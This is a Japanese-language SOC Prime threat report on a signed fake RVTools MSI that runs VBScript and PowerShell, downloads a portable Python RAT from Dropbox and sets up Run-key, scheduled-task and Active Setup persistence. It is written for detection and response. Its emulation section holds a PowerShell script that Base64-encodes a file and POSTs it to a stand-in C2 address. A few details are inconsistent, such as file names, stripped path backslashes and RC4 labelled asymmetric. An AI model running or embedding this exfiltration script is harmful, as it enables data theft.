RVTools の偽装: 署名された偽インストーラーがモジュラPython RATを展開する方法

SOC Prime Team

フォローする

RVTools の偽装: 署名された偽インストーラーがモジュラPython RATを展開する方法

Detection stack

AIDR
Alert
ETL
Query

脅威レポート
攻撃フロー
検出
シミュレーション

概要

正規の証明書で署名された悪意のあるMSIインストーラーが、VMware管理者が使用するRVToolsユーティリティを装っている。実行されると、インストーラーはVBScriptをドロップし、PowerShellを起動してDropboxから大きなZIPアーカイブをダウンロードする。アーカイブには、偵察、持続性、およびハードコードされたコマンドアンドコントロールサーバーへの通信が可能な多段階のRATを実行するポータブルPython環境が含まれている。

調査

解析はMSIをカスタムVBScriptアクションに追跡し、 Binary.MyScript.vbsが難読化されたPowerShellコマンドをデコードした。そのコマンドは winp.zip ペイロードを %APPDATA%にダウンロードし、Pythonコンポーネントや collector.py and Pmanager.pyのようなスクリプトを抽出し、再起動後にレジストリのRunキーとスケジュールドタスクを通じて持続性を確立した。研究者はまた、RATが収集したデータをRC4で暗号化し、5つの固定IPアドレスに5分間隔でビーコンを送信することを発見した。

緩和策

組織は、生のOCSPまたはCRLチェックを使用して厳格なコード署名の検証を実施し、信頼できないMSIの実行をブロックし、インストーラーパッケージに埋め込まれた不審なVBScriptカスタムアクションを監視する必要がある。また、防御者はダウンロードされたスクリプトの自動実行を防ぎ、新しいRunキーエントリやスケジュールドタスク作成を監視し、未知のハードコードされたIPアドレスへの送信トラフィックを警告する必要がある。

対応策

このアクティビティが検出された場合、影響を受けたエンドポイントを直ちに隔離し、法医学分析のためにMSI、VBScript、および抽出されたペイロードファイルを収集し、Runキーとスケジュールドタスクを含む全ての持続性のアーティファクトを削除する必要がある。識別されたコマンドアンドコントロールIPアドレスはファイアウォールでブロックされ、横移動が発生したかどうかを判断するために認証情報およびActive Directoryアクティビティの広範なレビューが行われるべきである。

“graph TB %% クラス定義 classDef phase fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef artifact fill:#e0e0e0 classDef persistence fill:#c2f0c2 classDef c2 fill:#f9c2c2 classDef evasion fill:#f0e68c %% フェーズ phase_initial_access[“フェーズ: 初期アクセス アクション – 被害者はRVToolsを装った署名された悪意のあるMSIを実行する。”] class phase_initial_access phase phase_execution[“フェーズ: 実行 アクション – MSIはMsiexecを使用してVBScriptを実行し、隠れたPowerShellダウンローダーを起動する。”] class phase_execution phase phase_payload[“フェーズ: ペイロード展開 アクション – アーカイブはcollector.pyとmanager.pyを含むポータブルWinPython環境に解凍される。”] class phase_payload phase phase_persistence[“フェーズ: 持続性 アクション – PythonマネージャーはレジストリのRunキー、スケジュールドタスク、およびアクティブセットアップエントリを作成する。”] class phase_persistence phase phase_c2[“フェーズ: コマンドアンドコントロール アクション – 収集したデータはアーカイブされ、RC4で暗号化され、ハードコードされたIPにHTTP POSTでexfilされる。”] class phase_c2 phase phase_evasion[“フェーズ: 防御回避 アクション – 署名されたバイナリ、プロキシ実行、および検出を回避するための文字の難読化の使用。”] class phase_evasion phase %% 初期アクセスのためのテクニック tech_user_execution[“技術 T1204.002 ユーザー実行:悪意のあるファイル 被害者は正当と信じる悪意あるファイルを実行します。”] class tech_user_execution technique tech_masquerading[“技術 T1036.001 マスカレーディング バイナリは署名されており、正規のユーティリティ(RVTools)のように命名されています。”] class tech_masquerading technique tech_trusted_dev_proxy[“技術 T1127 信頼された開発者ユーティリティプロキシ実行 署名されたバイナリは評判チェックを回避するために使用されます。”] class tech_trusted_dev_proxy technique %% 実行のためのテクニック tech_msiexec_proxy[“技術 T1218.007 システムバイナリプロキシ実行: Msiexec Msiexecは悪意のあるMSIを実行するために呼び出されます。”] class tech_msiexec_proxy technique tech_vbscript[“技術 T1059.005 コマンドおよびスクリプトインタプリタ: ビジュアルベーシック カスタムアクションはVBScriptペイロードを起動します。”] class tech_vbscript technique tech_powershell[“技術 T1059.001 コマンドおよびスクリプトインタプリタ: PowerShell VBScriptは隠されたPowerShellダウンロードコマンドをデコードして実行します。”] class tech_powershell technique %% ペイロード展開のためのテクニック tech_archive_custom[“技術 T1560.003 収集データのアーカイブ: カスタムメソッドを介してアーカイブ 33 MBのzip (winp.zip) がダウンロードされ、ポータブルPython環境を作成するために解凍されます。”] class tech_archive_custom technique %% 持続性のためのテクニック tech_registry_run[“技術 T1037.004 ブートまたはログオン初期化スクリプト: レジストリRun レジストリRunキーはスタートアップ時にmanager.pyを起動するために作成されます。”] class tech_registry_run persistence tech_scheduled_task[“技術 T1053 スケジュールドタスク/ジョブ SYSTEM特権で実行される毎日のスケジュールドタスクが作成されます。”] class tech_scheduled_task persistence tech_active_setup[“技術 T1547.014 ブートまたはログオン自動起動実行: アクティブセットアップ 各ユーザーに対する実行を保証するためにアクティブセットアップエントリが追加されます。”] class tech_active_setup persistence tech_hijack_execution[“技術 T1574 実行フローのハイジャック スケジュールドタスクは通常の実行パスをハイジャックするために使用されます。”] class tech_hijack_execution evasion %% コマンドアンドコントロールのためのテクニック tech_exfil_unencrypted[“技術 T1048.003 暗号化されていない非-C2プロトコルを介したデータ流出 データはHTTP POSTを介してハードコードされたIPアドレスに送信されます。”] class tech_exfil_unencrypted c2 tech_exfil_asymmetric[“技術 T1048.002 非対称暗号化された非-C2プロトコルを介したデータ流出 データは送信前にRC4で暗号化されます。”] class tech_exfil_asymmetric c2 %% 防御回避のためのテクニック tech_system_script_proxy[“技術 T1216.002 システムスクリプトプロキシ実行: SyncAppvPublishingServer 信頼されたスクリプトは悪意のある活動を隠すためにプロキシとします。”] class tech_system_script_proxy evasion tech_system_binary_proxy[“技術 T1218 システムバイナリプロキシ実行 署名されたユーティリティ（Msiexec）はアプリケーション制御を回避するために悪用されます。”] class tech_system_binary_proxy evasion %% アーティファクト artifact_msi[“アーティファクト: malicious_RVTools.msi 初期アクセス用に使用される署名されたMSIです。”] class artifact_msi artifact artifact_zip[“アーティファクト: winp.zip DropboxでホスティングされるポータブルWinPythonを含むアーカイブです。”] class artifact_zip artifact artifact_python_env[“アーティファクト: WinPython環境 偵察用のcollector.pyとmanager.pyを含みます。”] class artifact_python_env artifact artifact_registry_key[“アーティファクト: レジストリRunキー HKCUSoftwareMicrosoftWindowsCurrentVersionRunWinPythonMgr”] class artifact_registry_key artifact artifact_scheduled_task[“アーティファクト: スケジュールドタスク 名前: WinPythonDaily、SYSTEMで実行します。”] class artifact_scheduled_task artifact artifact_active_setup[“アーティファクト: アクティブセットアップエントリ HKLMSoftwareMicrosoftActive SetupInstalled ComponentsWinPython”] class artifact_active_setup artifact artifact_c2_ip[“アーティファクト: C2 IPアドレス TCP過剰で連絡されるハードコードされたIPv4アドレスです。”] class artifact_c2_ip artifact %% 接続 phase_initial_access –>|使用する| tech_user_execution phase_initial_access –>|使用する| tech_masquerading phase_initial_access –>|使用する| tech_trusted_dev_proxy phase_initial_access –>|配送する| artifact_msi tech_user_execution –>|実行する| artifact_msi tech_masquerading –>|可能にする| artifact_msi tech_trusted_dev_proxy –>|回避する| artifact_msi phase_execution –>|活用する| tech_msiexec_proxy tech_msiexec_proxy –>|実行する| tech_vbscript tech_vbscript –>|起動する| tech_powershell tech_powershell –>|ダウンロードする| artifact_zip artifact_zip –>|作成するために解凍された| artifact_python_env phase_payload –>|含む| artifact_python_env phase_persistence –>|作成する| tech_registry_run phase_persistence –>|作成する| tech_scheduled_task phase_persistence –>|作成する| tech_active_setup phase_persistence –>|使用する| tech_hijack_execution tech_registry_run –>|書き込む| artifact_registry_key tech_scheduled_task –>|作成する| artifact_scheduled_task tech_active_setup –>|書き込む| artifact_active_setup phase_c2 –>|データをアーカイブして暗号化する| tech_archive_custom tech_archive_custom –>|送信する| tech_exfil_unencrypted tech_exfil_unencrypted –>|使用する| artifact_c2_ip tech_exfil_unencrypted –>|また使用する| tech_exfil_asymmetric phase_evasion –>|適用する| tech_system_script_proxy phase_evasion –>|適用する| tech_system_binary_proxy tech_system_binary_proxy –>|促進する| tech_msiexec_proxy tech_system_script_proxy –>|促進する| tech_vbscript “

攻撃フロー

攻撃のナラティブとコマンド:
被害者マシンで既に足がかりを得た攻撃者は、小さなデータセット（例えば、 C:Tempsecret.txt）を流出させることを決定します。攻撃者は一般的なアウトバウンドトラフィック警報を引き起こさないように、 PowerShell のワンライナーを使用して、ハードコードされたC2 IPの1つ（192.0.2.10）に直接HTTP POSTを実行します。このコマンドはWindowsで スケジュールドタスク によって設定され、持続性を確保します(T1546.013)。追加のバイナリはドロップされず、活動は「living-off-the-land」を維持します。

リグレッションテストスクリプト:

# -------------------------------------------------
# PowerShellスクリプト - ハードコードされたIPを介したデータ流出
# -------------------------------------------------
$c2Ip   = "192.0.2.10"
$c2Port = 80
$uri    = "http://$c2Ip/exfil"
$file   = "C:Tempsecret.txt"

# ファイルが存在することを確認します（テスト用にダミーデータを作成）
if (-Not (Test-Path $file)) {
    "sensitive data $(Get-Date)" | Out-File -FilePath $file -Encoding ASCII
}

# ファイルの内容を読み込み、Base64でエンコードします
$payload = [Convert]::ToBase64String([IO.File]::ReadAllBytes($file))

# HTTP POSTを実行します
$body = @{ data = $payload }
try {
    Invoke-WebRequest -Uri $uri -Method POST -Body $body -UseBasicParsing -TimeoutSec 10
    Write-Host "$c2Ipへの流出試みが送信されました"
} catch {
    Write-Error "流出に失敗しました: $_"
}

クリーンアップコマンド:

# ダミーファイルを削除します
Remove-Item -Path "C:Tempsecret.txt" -Force -ErrorAction SilentlyContinue

# テストのために作成されたスケジュールドタスクを削除します
$taskName = "DataExfilTask"
if (Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue) {
    Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
}

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加